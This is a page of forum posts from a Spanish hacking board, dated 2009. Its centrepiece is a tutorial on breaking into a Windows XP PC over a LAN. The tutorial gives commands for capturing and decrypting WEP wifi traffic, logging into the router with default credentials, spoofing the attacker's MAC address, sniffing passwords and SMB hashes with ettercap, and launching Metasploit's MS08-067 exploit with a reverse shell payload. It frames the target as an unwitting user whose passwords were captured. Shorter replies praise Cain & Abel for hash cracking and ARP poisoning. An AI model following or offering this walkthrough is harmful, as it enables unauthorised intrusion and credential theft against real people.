elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 ... 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 [26] 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 ... 51
251  Seguridad Informática / Hacking / Re: Tuto: Entrando a un PC en LAN en: 15 Diciembre 2009, 21:12 pm
¬¬ extraño... 

se me ocurrio, porque al igual que estuve trabajando con ettercap, estuve trabajando con metasploit, y decidi que era buena idea hacer un tuto de como se usa metasploit... en entornos caseros... compre un router motorola, y una tarjetas de red nuevas para las pruebas de concepto...

y lo escribi entre ayer y hoy... pero no tuve acceso a internet y por eso me decidi a escribirlo, usando screenshots y material que por alli tenia, de una conferencia de seguridad en mi escuela, .caps, windows SP3, etc etc


no me sorprende que lo menciones, lo que me sorprende es que puedas pensar que lo copie y lo publique con mi nombre, en tu territorio.. eso pues ¬¬

tal vez sea la forma de redactarlo, o algo, o porque use el mismo exploit que tu..

el ms08-067, pero era mi objetivo usar ese, y no otro, porque es muy sencillo de usar y no requiere tanta config para explotarlo...

¬¬ no se que mas decir... me siento algo confundido,  :-\ y no se que hacer
252  Seguridad Informática / Hacking / Re: Tuto: Entrando a un PC en LAN en: 15 Diciembre 2009, 19:15 pm
Windows no creo que sea buena idea..

si vas a hackear algo, necesitas un sistema linux... porque ya trae todas la herramientas a un comando de distancia
253  Seguridad Informática / Hacking / Re: Tuto: Entrando a un PC en LAN en: 15 Diciembre 2009, 18:16 pm
todas las herramientas mencionadas existen en windows,

pero no he podido hacerlas funcionar correctamente, en especial en metasploit
254  Seguridad Informática / Hacking / Tuto: Entrando a un PC en LAN en: 15 Diciembre 2009, 16:55 pm
Tutorial: Explotando vulnerabilidades en LAN con Metasploit


Inicio: Este tutorial ha sido hecho con el fin de poner en evidencia el descuido de los user al negarse a actualizar su Windows, si bien por ignorancia, o por que su windows no es original, ignorando que tras cada inocente numero se oculta un peligro mucho mas grande, el poder controlar su equipo remotamente, aprovechando una vulnerabilidad que pudo haber sido parcheada desde Windows Update o desde la web del fabricante del Software, tal es el caso de Adobe 8.1.1 que tiene mas vulnerabilidades que deberia tener un simple lector de pdf's.

Veamos el Equipo a utilizar:

Ubuntu Linux 9.04 (atacante) Atheros AR5007EG

Windows XP SP3 (victima) Realtek PCI Ethernet

Metasploit 3.5 Framework (Lo haremos a consola, me gusta mas)

CABE ACLARAR QUE NO BORRE LAS MAC PORQUE ES EQUIPO VIEJO, QUE USE DE PRUEBA, por eso no me moleste en borrarlas, ya que el router que use, solo lo conecte para eso,de igual manera el xp, solo lo instale para esto, asimismo las wifi y ethernet, son equipo sin uso, y sin importancia


paso 1: Planeando el Golpe:

para planear el golpe, necesitamos hacernos de herramientas utiles, confiables y soporte de hard bueno y eficiente, para que no nos deje tirados a medio camino, veamos nuestra lista de herramientas:

Metasploit:



ettercap 0.7.3 un viejo favorito de todos, la GUI es mas util para propositos de este manual



Acer Aspire One

1gb de ram
Intel Atom a 1.6 Ghz
Y la roba carteras Atheros AR5007EG


paso 2: Estudiando a la victima:

La victima es un user tipico, sin mucho que hacer en un sistema XP clasico, sin actualizar, por miedo a que la copia de Windows no es original, (claro que lo es, ya que venia con el sistema) pero igual, insisto en que actualize y el replica, diciendo que no es necesario... bueno...

Tiene algunos metroflogs, navega por Wi-Fi, messenger y tiene a cargo de la seguridad el peor vigilante,  ESET Smart Security v4 con fix y crack y demas tonterias.. menudo usuario.. ademas de no darse cuenta de que tiene algunas carpetas compartidas.. lo cual puede ser interesante... pero a la vez algo totalmente inutil, ya que no voy por sus archivos, sino a hacerme con el control total del sistema, no tengo ningun interes en joderle sus trabajos, ya que de seguro le ha costado esfuerzo hacerlo...


PAso 3: Infiltracion

Tiene una conexion de 1mb, ISP Megacable, con un clasico modem motorola poco eficiente, pero es suficiente para navegar en internet, ya que usa cifrado WEP, entremos a su wifi, GUARDANDO LOS PAQUETES en .cap, usando el comando:

Código:
sudo airodump-ng --write hack --channel X <interfaz>



luego procedemos a desencriptarlo

(son pocos porque no quiero pasar buen rato capturando tonterias)

Código:
sudo airdecap-ng -w wepkey hack-01.cap



ya despues de haber sacado la pass del WIFI procedemos a explorar:


Paso 4: Explorando tierras desconocidas:

Por Seguridad, recomiendo que se cambien la MAC del Dispositivo, con macchanger-gtk o a mano con ifconfig/iwconfig, despues de que tomamos la seguridad necesaria... exploremos un poco en el router/gateway/puerta de enlace, si es que conseguimos acceso a el...



rango de IP: 192.168.0.10-26
Gateway:     192.168.0.1
user/pass     por defecto
WIFI users    2/2  WIFI/Ethernet
Objetivo:     192.168.0.10
SO:           WinXP SP3
Hard          P4 3.0 Ghz, 1gb RAM Dell Presicion 9150

importantisimo el decir que la pass y el user por defecto, puedes pillarlos en internet... bastante sencillo, tambien cabe aclarar que no es obligatoriamente necesario ownear al gateway... nosotros vamos a por el objetivo, no por sus archivos o su conexion, sino por su PC

luego con ettercap-ng  vemos que ha pasado por su modem en el instante que le sniffabamos, (esto es necesario cuando no tenemos acceso al router, mas que nada para ver IPs de lan, en caso de DHCP deshabilitado, o para ver otros dispositivos de la LAN, impresoras, scanners, camaras de vigilancia, etc)

abrimos el hack-01-dec.cap, que es la captura ya descifrada y le damos a Start Sniffing, el programa hablara por si solo, si es que tiene algo que decir



WTF???

le hemos pillado las pass de los 3 metroflogs y un hash de un admin de smb, un servicio para compartir recursos en sistemas windows.. vaya que cosas pasan por los modems... es casi imposible creerlo, no me agrada lo que he sacado, me confunde el que haya un dominio, y el admin intentando loguearse, pero en fin, quizas...

1.-No es el usuario que pensamos, quiza es una trampa bien elaborada
2.-Es una mini red privada con muchos equipos entrando y saliendo
    (pero no es posible, ya que la DHCP table, no indica mas que 4 equipos, tal vez la DHCP table, no guarda logs, solo muestra equipos en tiempo real)

¬¬ hmmm....  da igual, entraremos a fuerza.. de eso es el hacking

resumiendo esta area, tienes 2 opciones de exploracion:

1.- Entras a la WIFI como puedas,
2.-Puedes entrar al router y ver los host o puedes scanear los host por medio de ettercap
3.-si tu objetivo se conecta por WIFI, tienes 2 opciones, MITM con ettercap o capturar con airodump-ng y luego desencriptarle con airdecap y analizarle con ettercap
4.-si tu objetivo es por Ethernet, solo te queda la opcion de MITM con ettercap..
5.-en ambos casos (wifi/ethernet) el MITM se realiza de la misma forma, e independientemente del SO



paso 5:Limpiando y cerrojando Metasploit

A grandes rasgos podria decir que Metasploit es un set de exploits ya compilados y ya listos para la accion, preparados para ejecutarse y poder quebrantar la debil seguridad de un sistema Windows

instalamos metasploit desde su archivo .run bajado desde su web.

y luego en la terminal ejecutamos

Código:
sudo msfconsole

esperamos a que carguen los exploits y veremos la interfaz de metasploit tan interesante como su poder oculto..



hagamos un recuento, Win XP, no actualizaciones + SMB + NOD32fix + user tipico = control total del PC

podemos usar varios tipos de exploits, SMB me agrada y tiene mucho para ver:

es cuestion de poner en MSF

Código:
show exploits

y saldra algo com esto:


Código:
windows/smb/ms06_066_nwapi                                     good       Microsoft Services MS06-066 nwapi32.dll
   windows/smb/ms03_049_netapi                                    good       Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/smb2_negotiate_func_index                          good       Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   windows/smb/ms04_031_netdde                                    good       Microsoft NetDDE Service Overflow
   windows/smb/msdns_zonename                                     great      Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   windows/smb/psexec                                             excellent  Microsoft Windows Authenticated User Code Execution
   windows/smb/ms04_011_lsass                                     great      Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   windows/smb/ms08_067_netapi                                    great      Microsoft Server Service Relative Path Stack Corruption
   windows/smb/netidentity_xtierrpcpipe                           great      Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow.
   windows/smb/ms06_025_rras                                      average    Microsoft RRAS Service Overflow
   windows/smb/ms05_039_pnp                                       good       Microsoft Plug and Play Service Overflow
   windows/smb/ms04_007_killbill                                  low        Microsoft ASN.1 Library Bitstring Heap Overflow
   windows/smb/ms06_066_nwwks                                     good       Microsoft Services MS06-066 nwwks.dll
   windows/smb/ms06_025_rasmans_reg                               good       Microsoft RRAS Service RASMAN Registry Overflow
   windows/smb/ms06_040_netapi                                    great      Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/smb_relay                                          excellent  Microsoft Windows SMB Relay Code Execution

hmmm cual elegire..?? elegire.. este!

windows/smb/ms08_067_netapi

refiere a una vulnerabilidad en SMB que permite ejecutar codigo remoto, muy interesante:

empecemos:

para seleccionar el exploit, ponemos en consola:

Código:
use windows/smb/ms08_067_netapi

y saldra asi:



despues, lo configuramos, poniendo:

Código:
show options

asi:




RHOST: Ip del objetivo en LAN
RPORT: puerto del servicio afectado
SMBPIPE: nombre para usar del SMB pipe

si queremos cambiar/poner alguno de estos parametros, ponemos:

Código:
set RHOST 192.168.0.10
Código:
set RPORT 445

o lo que necesitemos, no siempre son estos valores ni esta la config...

luego tendremos que seleccionar el codigo remoto que ejecutara despues de triggerear la vulnerabilidad, llamada payload

Código:
show payloads



y estas son las mas importantes,

windows/shell_reverse_tcp                        normal  Windows Command Shell, Reverse TCP Inline
generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
windows/shell/bind_tcp                           normal  Windows Command Shell, Bind TCP Stager

2 bind para conectarse directamente y 2 reverses para que la victima se conecte a ti..

despues de selecciona la payload hay que seleccionar sus opciones, yo seleccione la primera de la lista
Código:
show options



para luego poner las opciones de la payload con estos comandos, elegi la payload de reverse connection porque se me hace mas facil, la reverse connection

Código:
set LHOST <tu ip de lan>
Código:
set LPORT 445

una vez listos todos los comandos y colocadas todas las ip, procedemos al ataque, ejecutando en metasploit el comando "exploit"

2da parte:

Tierras desconocidas... en proceso

Errores y demas, aqui por favor

Un Saludo

255  Seguridad Informática / Hacking / Re: Ayuda Cain & Abel en: 9 Diciembre 2009, 15:44 pm
nee

es igual...
256  Foros Generales / Foro Libre / Re: ¡Vuestros Ordenadores! en: 9 Diciembre 2009, 02:10 am
que hay arriba de la impresora??

polvo??
 :rolleyes:


saludos
257  Seguridad Informática / Hacking / Re: Ayuda Cain & Abel en: 8 Diciembre 2009, 17:01 pm
en si.. cain y abel es una mina de oro en Windows...

cracker de hashes...

generador de rainbow tables...

sniffer arp poisoner

decrypter..

etc

adivina los tokens RSA que usan los bancos...

aprende a usarlo, o busca un manual de las herr. que vienen en el programa
258  Seguridad Informática / Nivel Web / Re: Especial Navidad 2009 en: 3 Diciembre 2009, 14:16 pm
Citar
Actualmente es un sistema de pago y de código cerrado vulnerable a que cualquiera pueda encontrar bugs sin si quiera poder revisar su código fuente para que puedan ser reparadas oportunamente.
cPanel es uno de los sistemas mas utilizados en servidores de pago compartidos y resellers.

no te pegaron los de Cpanel??
 :silbar:

Saludos y gracias por postear esto,  algunos, incluyendome, somos admins medio desprevenidos...

Feliz Navidad
259  Seguridad Informática / Nivel Web / Re: ENHORABUENA SIMPLEAUDIT en: 2 Diciembre 2009, 22:34 pm
Enhorabuena al equipo de SimpleAudit...

alguien que publique los nombres del equipo de SimpleAudit...   :P


Saludos a todos...


el mod de alla de smf...bueno, no hay mucho que decir
260  Foros Generales / Foro Libre / Re: Lista de usuarios google wave **NO INVITACIONES** 30NOV09 en: 1 Diciembre 2009, 19:43 pm
y que se hace cuando tenemos un wave??
Páginas: 1 ... 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 [26] 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 ... 51
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines